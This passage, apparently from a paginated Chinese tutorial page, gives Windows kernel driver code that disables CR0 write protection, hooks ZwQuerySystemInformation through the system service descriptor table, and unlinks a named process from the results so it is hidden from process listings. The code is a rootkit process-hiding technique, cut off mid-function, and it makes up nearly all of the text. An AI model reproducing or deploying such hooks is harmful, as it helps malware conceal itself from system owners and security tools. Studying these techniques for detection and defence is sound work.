mov eax, cr0
mov cr0value, eax
and eax, 0fffeffffh //disablewriteprotect
mov cr0, eax
}
//取得原来zwquerysysteminformation的入口地址
realzwquerysysteminformation=(realzwquerysysteminformation)(((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)] );
//hook
((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)]=hookfunc;
//enablewriteprotect
__asm
{
mov eax, cr0value
mov cr0, eax
}
……
return status_success;
}
void driverunload (in pdriver_object pdriverobject)
{
……
//unhook恢复系统服务的原始入口地址
((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)] = realzwquerysysteminformation;
……
}
ntstatus hookfunc(
in ulong systeminformationclass,
in pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength)
{
ntstatus rc;
struct _system_processes *curr;
// 保存上一个进程信息的指针
struct _system_processes *prev = null;
//调用原函数
rc = (realzwquerysysteminformation) (
systeminformationclass,
systeminformation,
systeminformationlength, returnlength);
if(nt_success(rc))
{
if(5 == systeminformationclass)
//如果系统查询类型是systemprocessesandthreadsinformation
{
curr = (struct _system_processes *)systeminformation;
//加第一个偏移量得到第一个system进程的信息首地址
if(curr->nextentrydelta)((char *)curr += curr->nextentrydelta);
while(curr)
{
if(rtlcompareunicodestring(&hide_process_name, &curr->processname, 1) == 0)
{
//找到要隐藏的进程
if(prev)
{
if(curr->nextentrydelta)
{
//要删除的信息在中间
prev->nextentrydelta += curr->nextentrydelta;
}
else
{
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>